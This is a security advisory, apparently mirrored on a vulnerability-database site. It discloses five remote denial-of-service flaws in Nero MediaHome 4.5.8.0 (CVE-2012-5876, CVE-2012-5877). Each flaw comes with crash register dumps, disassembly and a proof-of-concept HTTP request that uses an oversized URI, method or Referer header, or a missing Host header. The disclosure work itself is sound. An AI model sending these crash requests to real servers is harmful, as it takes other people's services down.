Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHigh-Tech Bridge1337DAY-ID-20143
HistoryJan 10, 2013 - 12:00 a.m.

Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

2013-01-1000:00:00
High-Tech Bridge
0day.today
24

0.067 Low

EPSS

Percentile

93.1%

JSON

Nero MediaHome version 4.5.8.0 suffers from multiple denial of service vulnerabilities due to improper handling issues.

Product: Nero MediaHome
Vendor: Nero
Vulnerable Version(s): 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012 
Public Disclosure: January 9, 2013 
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.


1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876

1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.

Crash details:

EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 (  62040072) ->  (heap)
EBX: 003e0000 (   4063232) ->   [email protected]>@>" (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b2b000 (  62042112) -> D (heap)
ESI: 03b2a800 (  62040064) ->  (heap)
EBP: 0526f854 (  86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 (  86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 (   4063232) ->   [email protected]>@>" (heap)
+04: 00000022 (        34) -> N/A
+08: 003e0004 (   4063236) ->   [email protected]>@>" (heap)
+0c: 0526f88c (  86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A


Disasm around:

  0x7c921664 mov ecx,[ebp+0x10]
  0x7c921667 add eax,[ecx]
  0x7c921669 cmp eax,0xfe00
  0x7c92166e ja 0x7c920721
  0x7c921674 cmp byte [ebp+0x14],0x0
  0x7c921678 jnz 0x7c95ae10
  0x7c92167e mov ecx,[esi+0xc]
  0x7c921681 lea eax,[esi+0x8]
  0x7c921684 mov edx,[eax]
  0x7c921686 mov [ebp+0x8],ecx
  0x7c921689 mov ecx,[ecx]
  0x7c92168b cmp ecx,[edx+0x4]
  0x7c92168e mov [ebp+0xc],edx
  0x7c921691 jnz 0x7c921734
  0x7c921697 cmp ecx,eax
  0x7c921699 jnz 0x7c921734
  0x7c92169f push esi
  0x7c9216a0 push ebx
  0x7c9216a1 call 0x7c920684
  0x7c9216a6 mov eax,[ebp+0xc]
  0x7c9216a9 mov ecx,[ebp+0x8]


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None



1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.

Crash details:

EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 (  62271496) ->  (heap)
EBX: 003e0000 (   4063232) -> #  [email protected]>+ (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b64000 (  62275584) -> B (heap)
ESI: 03b63000 (  62271488) ->  (heap)
EBP: 0527f864 (  86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 (  86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 (   4063232) -> #  [email protected]>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) -> #  [email protected]>+ (heap)
+0c: 0527f89c (  86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A


Disasm around:

  0x7c921664 mov ecx,[ebp+0x10]
  0x7c921667 add eax,[ecx]
  0x7c921669 cmp eax,0xfe00
  0x7c92166e ja 0x7c920721
  0x7c921674 cmp byte [ebp+0x14],0x0
  0x7c921678 jnz 0x7c95ae10
  0x7c92167e mov ecx,[esi+0xc]
  0x7c921681 lea eax,[esi+0x8]
  0x7c921684 mov edx,[eax]
  0x7c921686 mov [ebp+0x8],ecx
  0x7c921689 mov ecx,[ecx]
  0x7c92168b cmp ecx,[edx+0x4]
  0x7c92168e mov [ebp+0xc],edx
  0x7c921691 jnz 0x7c921734
  0x7c921697 cmp ecx,eax
  0x7c921699 jnz 0x7c921734
  0x7c92169f push esi
  0x7c9216a0 push ebx
  0x7c9216a1 call 0x7c920684
  0x7c9216a6 mov eax,[ebp+0xc]
  0x7c9216a9 mov ecx,[ebp+0x8]


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None



1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.

Crash details:

EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^[email protected]_lhf19fPf36dLaExe (heap)
EBX: 003e0000 (   4063232) ->   @>+ (heap)
ECX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^[email protected]_lhf19fPf36dLaExe (heap)
EDX: 03b50101 (  62193921) -> N/A
EDI: 03c1bb30 (  63028016) -> yDPyDh8yDh >>#H"G^^^^o^[email protected]_l (heap)
ESI: 03c1bb88 (  63028104) ->  >>#H"G^^^^o^[email protected]_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 (  54262904) -> L;L (stack)
ESP: 033bfc6c (  54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@[email protected] >@>;;; |`|;9Lx> (stack)
+00: 003e0000 (   4063232) ->   @>+ (heap)
+04: 03c1bb78 (  63028088) ->  >>#H"G^^^^o^[email protected]_lhf19fPf36dLa (heap)
+08: 00000000 (         0) -> N/A
+0c: 033bfd4c (  54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;[email protected]?[email protected]@[email protected]@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 (  61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)


Disasm around:

  0x7c9209fe mov al,[esi+0x5]
  0x7c920a01 and al,0x10
  0x7c920a03 test al,0x10
  0x7c920a05 mov [edi+0x5],al
  0x7c920a08 jnz 0x7c920aa0
  0x7c920a0e mov ecx,[esi+0xc]
  0x7c920a11 lea eax,[esi+0x8]
  0x7c920a14 mov edx,[eax]
  0x7c920a16 mov [ebp+0xc],ecx
  0x7c920a19 mov ecx,[ecx]
  0x7c920a1b cmp ecx,[edx+0x4]
  0x7c920a1e mov [ebp+0x14],edx
  0x7c920a21 jnz 0x7c921752
  0x7c920a27 cmp ecx,eax
  0x7c920a29 jnz 0x7c921752
  0x7c920a2f push esi
  0x7c920a30 push ebx
  0x7c920a31 call 0x7c920684
  0x7c920a36 mov eax,[ebp+0x14]
  0x7c920a39 mov ecx,[ebp+0xc]
  0x7c920a3c cmp eax,ecx


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com



1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. 

Crash details:

EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 (  63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 (   4063232) ->   [email protected]>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 (  63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 (  63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 (  86505512) -> `' (stack)
ESP: 0527f81c (  86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
  +00: 003e0000 (   4063232) ->   [email protected]>+ (heap)
  +04: 00000021 (        33) -> N/A
 +08: 003e0004 (   4063236) ->   [email protected]>+ (heap)
   +0c: 0527f860 (  86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
   +10: 7c928ccd (2089979085) -> N/A
   +14: 03ad5600 (  61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)


Disasm around:

  0x7c9209f8 jnz 0x7c95af5f
  0x7c9209fe mov al,[esi+0x5]
  0x7c920a01 and al,0x10
  0x7c920a03 test al,0x10
  0x7c920a05 mov [edi+0x5],al
  0x7c920a08 jnz 0x7c920aa0
  0x7c920a0e mov ecx,[esi+0xc]
  0x7c920a11 lea eax,[esi+0x8]
  0x7c920a14 mov edx,[eax]
  0x7c920a16 mov [ebp+0xc],ecx
  0x7c920a19 mov ecx,[ecx]
  0x7c920a1b cmp ecx,[edx+0x4]
  0x7c920a1e mov [ebp+0x14],edx
  0x7c920a21 jnz 0x7c921752
  0x7c920a27 cmp ecx,eax
  0x7c920a29 jnz 0x7c921752
  0x7c920a2f push esi
  0x7c920a30 push ebx
  0x7c920a31 call 0x7c920684
  0x7c920a36 mov eax,[ebp+0x14]
  0x7c920a39 mov ecx,[ebp+0xc]


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]



2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877

2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.

Crash details:

EIP: 10003171 mov [eax+0x18],ebp
  EAX: 00000000 (         0) -> N/A
  EBX: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
  ECX: 039cddea (  60612074) -> localhost (heap)
  EDX: 039cddea (  60612074) -> localhost (heap)
  EDI: 037bc888 (  58443912) -> ||{[email protected]}{AY+ (heap)
  ESI: 037c7fb0 (  58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
  EBP: 00000009 (         9) -> N/A
  ESP: 0563fad0 (  90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
  +00: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
  +04: 039cdde8 (  60612072) ->  localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
  +08: 00000000 (         0) -> N/A
  +0c: 00000001 (         1) -> N/A
  +10: 000000b8 (       184) -> N/A
  +14: 037c7318 (  58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)


Disasm around:

  0x10003156 mov edx,[esi+0x8]
  0x10003159 mov ebp,[esi+0xc]
  0x1000315c push byte 0x1
  0x1000315e push eax
  0x1000315f push ecx
  0x10003160 push ebx
  0x10003161 mov [edi+0x40],esi
  0x10003164 mov [esp+0x2c],edx
  0x10003168 call 0x10002730
  0x1000316d mov ecx,[esp+0x2c]
  0x10003171 mov [eax+0x18],ebp
  0x10003174 mov ebp,[esp+0x24]
  0x10003178 add esp,0x10
  0x1000317b mov [eax+0x14],ecx
  0x1000317e mov edx,[ebp+0x8]
  0x10003181 test edx,edx
  0x10003183 mov [esp+0x14],edx
  0x10003187 jnz 0x10002ff0
  0x1000318d mov eax,[esp+0x24]
  0x10003191 push eax
  0x10003192 call 0x10002c20


Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:

GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com


-----------------------------------------------------------------------------------------------

Solution:

Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."

As a temporary solution it is advised to remove the vulnerable application from your system.

-----------------------------------------------------------------------------------------------

#  0day.today [2018-01-04]  #

Related

exploitpack 1
htbridge 1
packetstorm 1
openvas 1
securityvulns 2
exploitdb 1
prion 2
cve 2
exploitpack
exploitpack
Nero MediaHome 4.5.8.0 - Denial of Service
2013-01-10 00:00:00
htbridge
htbridge
Nero MediaHome Multiple Remote DoS Vulnerabilities
2012-11-21 00:00:00
packetstorm
packetstorm
Nero MediaHome 4.5.8.0 Denial Of Service
2013-01-10 00:00:00
openvas
openvas
Nero MediaHome Server Multiple Remote DoS Vulnerabilities
2013-01-10 00:00:00
securityvulns
securityvulns
Nero MediaHome Multiple Remote DoS Vulnerabilities
2013-01-10 00:00:00
Nero MediaHome DoS
2013-01-10 00:00:00
exploitdb
exploitdb
Nero MediaHome 4.5.8.0 - Denial of Service
2013-01-10 00:00:00
prion
prion
Heap overflow
2014-05-30 14:55:00
Null pointer dereference
2014-05-30 14:55:00
cve
cve
CVE-2012-5876
2014-05-30 14:55:00
CVE-2012-5877
2014-05-30 14:55:00

0.067 Low

EPSS

Percentile

93.1%

JSON
Related for 1337DAY-ID-20143
exploitpack1htbridge1packetstorm1openvas1securityvulns2exploitdb1prion2cve2